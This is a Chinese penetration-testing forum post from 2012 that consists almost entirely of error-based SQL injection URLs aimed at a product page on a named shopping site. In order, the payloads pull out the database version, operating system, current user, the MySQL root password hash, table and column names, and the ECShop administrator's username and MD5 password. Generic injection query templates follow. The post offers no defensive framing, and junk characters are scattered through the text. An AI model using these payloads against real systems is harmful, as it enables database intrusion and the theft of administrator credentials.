找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 盲注详细内容
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2247|回复: 0
打印 上一主题 下一主题

盲注详细内容

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-5 14:59:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
判断版本号 1 O* @8 r- H; V8 M9 V7 E
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23  z. p/ G9 X1 P* G2 H" b& l

( r; U4 v) [. ]# I判断系统
# [: D( i( o  ~" C/ Y5 X3 G; V/ i: B
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%233 J+ f# b8 v5 d# F9 j: P

4 d) v, E4 m4 G* l( V4 O6 t) N" N4 g7 q) D) W1 X/ y
3 k: E  Q* R* z7 Z( D% \7 h
当前 user(), g4 Y9 j' |+ A9 |+ k& `, q

4 k6 v  u+ E& v2 M+ m+ b* Nhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%239 F; e% F* ?# _

% Y* x$ g' q; [( A4 L3 ~: W4 o+ @! `- S( k, d( b$ A' N7 \3 b
( T1 Y/ K+ s; e
当前 database()
! z& J- j; h* ihttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23( G+ l9 N: k4 }) m8 d

  T/ M4 A) I' u, O+ Y' j. |7 j* Q& d+ [9 P8 \, d, g

# u$ f8 }. T" R' f1 a! b1 U9 m+ y: ?6 [+ C6 ]5 V5 J" ]: g& i  ?
root hash
$ ], k# e6 ~# E! K
; G' b, @0 U8 ]+ T$ zhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
& U! I: W; t, c& ]- Y
% K* D* a- I6 Y: Y2 b' Q* c- Y; Z! y' Z# ^! l( [" T* q/ U; w5 G

6 {. B0 I* C  n) m当前 数据库表名" I1 v' i: F1 t( R2 K3 J

" J: A8 \3 [/ \http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23& x- T3 p0 X9 J8 S

: n. Q9 X1 w& Q8 T6 X4 O8 h9 w# B, _/ c: T# I4 l  m+ h# E
" }" ^' m$ }; B$ ?5 ?0 C. S$ n
当前 数据库 user_name 字段0 W" e1 M) C3 C. ~
" w1 r; @# s. U  T5 W+ x
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23& P+ `" e! M0 x) Q

5 A) y! m5 [3 O! B; F4 Z+ w, Z当前 数据库 字段 password
# j7 Z" a% ]4 L" c/ S. Ahttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
2 O7 v* t9 R! S. {# I' k5 h8 ~+ V  n, \' `7 j  C/ a* ?! d: T

, G1 i! d( L' a& m  d/ ]4 y' V0 _+ a; n3 ~: [
获得 admin passwd(md5)
" p" k; `* @/ _' s/ Y
5 v* S: P8 E. k$ ^1 [2 |2 |2 B9 _6 n/ k+ }8 C+ }5 r
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
9 d4 J* i0 m' k5 T' t- f) k* }1 u) r4 s  h" N! {. ?: D: }9 M, _
报错注射
/ F. `; ~3 ]6 A3 ?( d" kSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
" E6 @( o' g+ v# d5 y$ ^- i0 |3 o7 c# x( R- K% W3 P
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)* U' K) T3 |) H5 z

7 J6 v$ _# C+ p( E2 qand(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表